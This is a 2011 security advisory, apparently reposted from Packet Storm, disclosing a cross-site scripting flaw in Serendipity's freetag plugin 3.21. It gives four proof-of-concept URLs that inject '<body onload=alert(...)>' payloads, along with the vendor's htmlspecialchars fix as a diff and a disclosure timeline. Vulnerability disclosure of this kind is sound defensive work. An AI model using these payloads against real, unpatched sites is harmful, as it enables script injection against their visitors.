Serendipity version 1.5.5 with the serendipity_event_freetag plugin suffers from a cross site scripting vulnerability.
80f380cee14afc2bf6ffc4f765065bf2355d85b4916e4a9dcb1b7a2096a79e6bAdvisory: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"
Advisory ID: SSCHADV2011-004
Author: Stefan Schurtz
Affected Software: Successfully tested on: Serendipity 1.5.5 with serendipity_event_freetag - version 3.21
Vendor URL: http://www.s9y.org
Vendor Status: Version 3.22 - Fix possible XSS
CVE-ID: -
==========================
Vulnerability Description:
==========================
This is Cross-Site Scripting vulnerability
==================
Technical Details:
==================
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>
http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>
=========
Solution:
=========
Update to the latest version 3.22
diff serendipity_event_freetag.php
< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $
> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24 garvinhicking Exp $
< $propbag->add('version', '3.21');
> $propbag->add('version', '3.22');
< $serendipity['smarty']->assign('freetag_tagTitle', is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag);
> $serendipity['smarty']->assign('freetag_tagTitle', htmlspecialchars(is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag));
====================
Disclosure Timeline:
====================
30-May-2011 - informed developers
30-May-2011 - Release date of this security advisory
30-May-2011 - Version 3.22 - Fix possible XSS
31-May-2011 - post on BugTraq and Full-disclosure
========
Credits:
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References:
===========
http://www.s9y.org
http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update,-XSS-bug.html
http://www.rul3z.de/advisories/SSCHADV2011-004.txt
http://ha.ckers.org/xss.html
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed